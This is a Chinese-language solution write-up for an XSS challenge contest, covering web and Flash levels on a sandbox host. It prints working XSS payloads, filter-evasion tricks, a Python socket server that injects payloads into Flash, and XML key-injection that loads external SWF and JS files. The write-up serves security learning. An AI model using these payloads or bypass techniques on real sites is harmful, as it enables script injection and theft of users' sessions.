本次比赛参与人数3700多人,提交并获得了分数的正确答案共有1069条。最终有65名参赛者获得了奖品,一、二、三名分别由p.z,piaca和香草获得。答题结果的总体分布如下:

enter image description here

年龄越来越大,记性越来越差。就当做笔记吧(所有 POC 都只是为了通关)。

1. FB-0

这一关没什么可说的,直接给出 POC:

http://sandbox.host.smartgslb.com/fb0/xss1.php?code=</script><svg/onload=alert(1)//

2. FB-01

这一关只有有个坑就是 正则

name=name.replace(/</,"&lt;");

replace 没有使用全局 g 参数,造成只会替换字符串中的第一个 “<” 符号,所以这关的 POC:

http://sandbox.host.smartgslb.com/fb1/#code=<<svg/onload=alert(1)>

3. FB-02

这一关访问很明显就是一段 js 代码,只是去掉了 <script>, 直接输入到页面上,但是通过 func 参数可以控制页面上的两个点。由于 POC 要求 chrome 有效,所以最初一直停留在绕 chrome 的 XSS Auditor 上了,浪费不少时间。后面重新换个思路,利用两个输出点,结合当前页面内容,通过下面 POC 过关:

http://sandbox.host.smartgslb.com/fb2/?func=';alert(1);</script><script>tpl={'

4. FB-03

这一关比较简单,绕过对 page 的检测,加载一个外域的 JS 文件,直接给 POC:

http://sandbox.host.smartgslb.com/fb3/?page=//test.com/1

5. FB-04

这一关的表单提交是用来迷惑的,重点在 eval,POC:

http://sandbox.host.smartgslb.com/fb4/?key=#";alert(1);"

6. FB-05

这关的利用点是头像,表单提交,在 pic 中提交如下 POC:

upic=./img/head_2.png' onload=alert(1) '

7. FB-06

这一题最主要的就是换行符,在 XSS挑战第二期 Writeup 中有提到,记性不好,以至于卡了很久。

这里有个关键的地方就是 xss6.js 中的:

var SERVER_TEMP  = $.Tjs_HtmlEncode(str.replace(/.*\?/,"")); //HtmlEncode 进行安全验证

这行代码让我们对 ? 失去了幻想,还记得 FB-01 里面的那个正则么,这里很神似,但是却更狠。所以我们需要一个换行符,普通的 %0D%0A 是不行的,所以这里需要 &#x2028;,由于 chrome 不能直接在浏览器中插入这个符号,所以我们通过一个 iframe 来引用它:

<iframe src="http://sandbox.host.smartgslb.com/fb6/xss6.htm#?&#x2028;&uin=..&pn=user.php?callback=dodo#"></iframe>

user.php 这个 callback 接口有限制,还需要绕过这里的限制才能够执行 JS 代码,经过测试程序对几乎所有可以执行代码的关键字进行了过滤,但是对 [ ] ( ) . 等没有进行限制,可以通过下面的方法来绕过:

this[17795081..toString(36)](1)

最后的 POC:

<iframe src="http://sandbox.host.smartgslb.com/fb6/xss6.htm#?&#x2028;&uin=..&pn=user.php?callback=this[17795081..toString(36)](1)#"></iframe>

8. FB-07

这一题需要的技巧真是不少,经过 pz 大牛的指点才过关的。 仔细看代码,思路就会很明确,就是要想办法执行下面的代码:

document.getElementById("username").innerHTML = '<a href="http://pkav.net/' + uid + '" target=_blank> 小白 </a>';

但是过程不容易,表面上需要解决下面两个难点:

  1. 想办法让 jsDesert 的值不为 undefined,这样 jsDessert 的值才不会是 undefined,include 函数才能够正常执行
  2. jsDessert[j0] 不为 false,include 的第二个参数,也就是传入的函数才能够执行

但是实际上如何解决呢,先来看第一个 jsDesert。页面执行下来,先去通过 DOM 去改变 iframe 的 src 为:http://appmaker.sinaapp.com/stat.php,这个页面中嵌入一段 JS 代码,我们能够通过 man 参数控制页面的一部分内容,这里是关键。

穿插一下:浏览器有个特性,支持直接以 id 或者 name 属性值获取元素,各浏览器之间会有差异,但是对于 IFRAME 几乎所有的浏览器都一样,详细的可以参考 各浏览器中对直接以 id 或者 name 属性值获取元素存在差异

所以我们只要能够控制 id 为 x 的 IFRAME 的 name,把值设置为 jsDesert,JS 就能够通过 jsDesert 直接获取到 IFRAME,这样 jsDesert 就不为 undefined。怎么设置呢?在 IFRAME 中我们能够执行有限的 JS 代码,但是赋值还是可以的,所以通过 window.name=jsDesert 就可以,事实上程序对长度有限制,如果使用 window.name 会超出长度限制,所以通过 self.name 绕过,也就是下面的 URL:

http://sandbox.host.smartgslb.com/fb7/?man=';self.name='jsDesert&uid=1

这样,include 才不会报错,继续执行,加载另外一个 callback 文件:http://appmaker.sinaapp.com/nick.php。这个 callback 文件我们要控制 func,这里通过 # 来让程序使用我们的 func。

http://sandbox.host.smartgslb.com/fb7/?man=';self.name='jsDesert&uid=1&func=x#

但是要想让 jsDessert[j0] 不为 false,可以通过 func 为 jsDessert 来覆盖掉 jsDessert,这样 jsDessert[j0] 为 undefined 同样不为 false。但是 func 有过滤策略,经过测试可以通过 self.jsDessert 来绕过,下面链接看效果:

http://sandbox.host.smartgslb.com/fb7/?man=';self.name='jsDesert&uid=1&func=self.jsDessert#

到这里,POC 就很容易了:

http://sandbox.host.smartgslb.com/fb7/?man=';self.name='jsDesert&uid=1&func=self.jsDessert#">
<iframe/onload=alert(1)>

9. FB-08

这题没解出来,结束后问 sogili,他说了两个字 刷新 ,好吧,无限刷新下面的 POC,总会弹的:

http://sandbox.host.smartgslb.com/fb8/index.php?vul=alert(1);

10. Flash-01

反编译 Flash ,在代码中可以看到,从 mp3 的 ID3 中取出的 songName 数据,进入到了 ExternalInterface.call 中,并且 mp3 文件受控于 mp3 参数。所以指定一个 mp3 文件,把 ID3 中的 songName 修改为 payload:

\"));alert(1);}catch(e){}//

POC为:

http://sandbox.host.smartgslb.com/flash_1/XSSC1.swf?mp3=http://test.com/1.mp3 

11. Flash-02

Flash 类的题目从这题开始就都比较坑了,仍然反编译 Flash。经过一番那啥代码之后我们大概总结一下:

  1. 传入 Flash 的两个参数 init 和 params 两个参数我们都可控
  2. Flash 代码中的 ExternalInterface.call 都无法利用
  3. Flash 通过 addCallback 公开一个 trace 方法给 JS 调用

又经过一番那啥代码,有了新的收获:

  1. 可控的 init 参数我们可以指定为 Flash 公开出来的方法 trace,这样 Flash 就会调用这个 trace 方法
  2. trace 方法返回的是 urlEncode 对 location.href 处理后的数据,location.href 我们可控,并且 addCallback 是会产生 XSS 问题的

思路明确,后面就需要搞定 urlEncode,根据这段函数写出下面的函数:

a = "\\\"});alert(1);//";
str = ""
for(i=0;i<a.length;i++){
        s = (((a.charCodeAt(i) - 1) % 127) - 10).toString(16);
        str = str + "%" + s;
}
console.log(str);

得到 payload 为:

%51%17%72%1e%30%56%61%5a%67%69%1d%26%1e%30%24%24 

最终的 POC 为:

http://sandbox.host.smartgslb.com/flash_2/?%51%17%72%1e%30%56%61%5a%67%69%1d%26%1e%30%24%24&initfunc=document.mycontent.trace

12. Flash-03

先说依据,这一题光图案我就对了好久。仍旧是反编译 Flash。通过代码看到 Flash 可以加载一个我们可控的 Flash,只有当 img 的 width 和 height 值分别为 200 和 300 的时候才会把 XML 中的数据进入到 htmltext 中,so 我就开始疯狂调整 XML 中的参数,以达到过关目的。但是 width 和 height 是会受 xscale 和 yscale 影响的,在 Flash 代码中对这两个值做了限制就是不能大于 0.8,怎么调整 XML 中的这几个值都无法达到想要的效果,无意中把 width 和 height 值设置为 200 和 300,把 xscale 和 yscale 这两个值设置为 -1,结果竟然它就它就它就……

所以 POC 为:

http://sandbox.host.smartgslb.com/flash_3/?url=//test.com/1.xml 

XML 文件的内容为:

<pkav>
    <rect width="200" height="300" xscale="-1" yscale="-1" rotate="-180">
        <successMsg>
        <![CDATA[
            <img src='http://xsst.sinaapp.com/Xss.swf'>
        ]]>
        </successMsg>
    </rect>
</pkav>

13. Flash-04

这一题我最初是直接跳过,到最后才搞定的。还是反编译 Flash,通过分析代码看到 hostName 可以指定 Flash socket 连接的服务器,就去 google 了 Flash socket 相关的资料。

结合 html 中的提示 xss with clickjacking 和经过一番那啥代码和坑之后有了大概的思路:

  1. 在可控的服务器上运行一个 Flash socket policy server,用于 Flash 加载安全策略文件
  2. 在这个可控的服务器上运行一个 Flash socket server,用于向 Flash 发送数据(主要是点击 Flash 上的 用户登陆
  3. 当发送的数据达到一定的要求就会把数据进入到 ExternalInterface.call 中

先构建 Flash socket policy server,这个 google 下有现成的代码,可以参考下面连接的 python 代码:

http://114.215.178.29/static/projects/newgis.2013/etc/flex_socket_policy/flashpolicyd.py

这个服务运行在 843 端口上,策略文件的内容为:

<?xml version="1.0"?><cross-domain-policy><site-control permitted-cross-domain-policies="all"/><allow-access-from domain="*" to-ports="*" /></cross-domain-policy>

其次构建 Flash socket server,用于向 Flash 发送 payload,这里我首先通过一个 python echo server,运行在 6700 端口,观察 Flash 和该 socket server 通信的内容。经过来回倒腾两次大概知道了规律,所以更改了 python 代码,在接收到 Flash 发送过来的数据后直接修改最后的一部分数据为 payload,然后再发送到 Flash 上,代码如下:

#!/usr/bin/env python

import socket

host = ''
port = 6700
backlog = 5
size = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
s.bind((host,port))
s.listen(backlog)
while 1:
    client, address = s.accept()
    data = client.recv(size)
    if data:
        client.send(data[:-26] + "\\\"));}catch(e){alert(1)}//")
    client.close()

把上面两个服务运行起来后,就有了 POC:

http://sandbox.host.smartgslb.com/flash_4/XSSC4.swf?hostName=test.com

访问上面 POC,点击 用户登陆 即可。

14. Flash-05

这题过关的思路很清晰,就是通过 addChild 加载一个外部的 Flash 文件,但是如果加载呢,有难度。

html 页面传入两个参数 url 和 callback,url 就是传入到 Flash 中用 addChild 去加载,但是看了下 html 中对 url 的检测和过滤代码,几乎无望。希望只能够寄托到 callback 上。

仔细理了一下整个过程,url 和 callback 这两个参数组装成 JS 中的 data 对象,callback 可控的是对象的一个键值,那思路就应该是用 callback 去覆盖掉前面的 url,达到目的。如何覆盖呢,又陷入困境。

通过 IE 的 JS 调试器,一步一步的跟踪,看下数据的整个处理流程,发现了亮点。data 是一个对象,进入到 Flash 中是要转换成 XML 的,转换的主要函数为:

function __flash__objectToXML(obj) {
        var s = "<object>";
        for (var prop in obj) {
                s += "<property id=\"" + prop + "\">" + __flash__toXML(obj[prop]) + "</property>";
        }
        return s+"</object>";
}

看到两点了么,通过遍历对象,然后把键和值生成一个 XML 值,在函数中是不对对象的健做任何处理的,正常页面中的 data 为:

data={"url":".\/o.png","pkav":"pkav"};

经过处理后的 XML 值为:

<object><property id="url"><string>./o.png</string></property><property id="pkav"><string>pkav</string></property></object>

我们把 callback 修改为:

url"><string>http://xsst.sinaapp.com/Xss.swf</string></property><property id="x

data 就变成了:

var data={"url":".\/o.png","url\"><string>http:\/\/xsst.sinaapp.com\/Xss.swf<\/string><\/property><property id=\"x":"pkav"};

经过处理后的 XML 值为:

<object><property id="url"><string>./o.png</string></property><property id="url"><string>http://xsst.sinaapp.com/Xss.swf</string></property><property id="x"><string>pkav</string></property></object>

有两个 url,Flash 会认为最后一个 url 有效。这样就有了 POC:

http://sandbox.host.smartgslb.com/flash_5/?url=./o.png&callback=url"><string>http://xsst.sinaapp.com/Xss.swf</string></property><property id="x

over